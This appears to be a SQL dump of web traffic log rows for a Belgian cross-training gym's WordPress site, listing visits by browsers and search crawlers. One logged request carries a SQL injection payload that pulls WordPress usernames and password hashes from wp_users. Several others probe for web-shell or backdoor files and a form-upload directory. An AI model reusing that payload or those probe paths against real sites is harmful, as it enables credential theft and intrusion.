(70946, 1493391704.777477, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70945, 1493383359.187754, 3323226906, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(70944, 1493381104.612841, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70943, 1493381104.032877, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70941, 1493381102.617885, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70942, 1493381103.207652, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70940, 1493381101.987359, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70939, 1493381101.133966, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70937, 1493381099.832203, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70938, 1493381100.442615, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70936, 1493381099.150282, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70935, 1493381098.591970, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70933, 1493374662.639487, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(70934, 1493381097.934427, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70931, 1493374662.092272, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(70932, 1493374662.116801, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70930, 1493374660.631877, 1538649748, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70929, 1493374641.532576, 1538649748, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70928, 1493370110.757058, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70927, 1493370110.485308, 3234106972, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70926, 1493370098.649715, 3234106972, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70925, 1493370096.678007, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70924, 1493370096.409181, 3234106972, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70923, 1493370089.847105, 3234106972, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70922, 1493370088.180356, 3234106972, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com/search?q=cross+training+bruxelles&src=ie9tr', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70921, 1493370087.004008, 3339975108, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)'),
(70919, 1493341771.086778, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70920, 1493351675.008488, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70918, 1493341768.141709, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70917, 1493341002.666322, 1833311020, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70915, 1493333135.124151, 3163187461, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-dreamworkgallery/css/admin.css', '', 'Mozilla/5.0 (WordPress.com; http://support.wordpress.com/contact)'),
(70916, 1493336888.147782, 2996488257, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70914, 1493332671.399503, 2905398467, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(70913, 1493326376.332462, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70912, 1493326375.679252, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70911, 1493326374.862655, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70909, 1493326369.742150, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70910, 1493326371.838556, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70908, 1493326368.747862, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70907, 1493326367.976443, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70906, 1493326367.534513, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70904, 1493326366.680732, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70905, 1493326367.118512, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70903, 1493326366.145861, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70902, 1493326365.720702, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70901, 1493326364.987786, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70900, 1493326363.920109, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70899, 1493316316.843267, 1837857107, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36'),
(70898, 1493316314.682519, 1837857107, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36'),
(70896, 1493305326.035028, 3475901820, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70897, 1493313617.724259, 1049233326, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'),
(70894, 1493305232.295773, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70895, 1493305232.987912, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70893, 1493305231.784312, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70892, 1493305231.192120, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70891, 1493305230.577187, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70890, 1493305229.907109, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70888, 1493305228.857230, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70889, 1493305229.398763, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70887, 1493305228.411605, 1837953980, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70886, 1493305227.909287, 1837953980, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70864, 1493266758.371298, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70863, 1493266743.800217, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70862, 1493266734.303396, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70861, 1493266729.825626, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70860, 1493265991.030108, 3392025247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(70859, 1493261236.153075, 2366158596, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70858, 1493261232.319024, 2996485408, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70857, 1493261232.059341, 2366148291, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70856, 1493259548.405748, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/fluid_forms/file-upload/server/content/', 'http://www.crosstrainingcenter.be/wp-content/plugins/fluid_forms/file-upload/server/content/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70854, 1493254830.597619, 2760155479, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70855, 1493258358.909500, 2637637525, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(70853, 1493240081.700108, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70851, 1493240063.090215, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70852, 1493240077.671981, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70850, 1493240057.408049, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70849, 1493240018.636322, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70848, 1493240014.212924, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70847, 1493240007.484018, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70846, 1493240000.011480, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70845, 1493239995.213333, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70844, 1493239944.813169, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70843, 1493239939.399269, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70842, 1493239938.946169, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70841, 1493237502.283528, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70840, 1493233015.785213, 2637637385, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70839, 1493232474.632667, 3641698364, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69177, 1491821919.192657, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69178, 1491829091.022008, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69179, 1491829554.251652, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69180, 1491829941.153060, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69181, 1491830377.485878, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69182, 1491830822.485356, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69183, 1491831265.468744, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69184, 1491831659.926057, 1439268003, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69185, 1491831663.963787, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69186, 1491832067.475007, 1123631639, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69187, 1491832532.298477, 1123631639, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69188, 1491833369.599544, 3475901914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69189, 1491835850.150775, 522139388, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.ch/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69190, 1491835851.956000, 522139388, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69191, 1491836655.447424, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjA7PbNlJrTAhUSGhQKHd6PAGQQFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=_s_41FaqNiZmVstNxzODZg', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69192, 1491836659.791585, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69193, 1491836660.199913, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69194, 1491838694.762187, 3475901903, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69195, 1491840311.690623, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/update.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(69196, 1491840313.424868, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/update.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(69197, 1491842133.379245, 874482351, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://webxtrakt.be/crosstrainingcenter.be', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'),
(69198, 1491852096.331116, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69199, 1491852096.893277, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69200, 1491855226.757596, 782305556, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),
(69201, 1491855227.434369, 782305556, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),
(69202, 1491859741.601122, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/version.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69203, 1491859755.904790, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/admin/language/english/total/arhive.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69204, 1491859962.790844, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cmsbuild.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69205, 1491860469.761174, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/media/version.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69206, 1491860533.499399, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/dump.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69207, 1491860549.016493, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-api.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69208, 1491860750.155426, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/common.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69209, 1491860962.956055, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/cmsbuild.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69210, 1491861124.635732, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/mod_ariimageslidersa.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
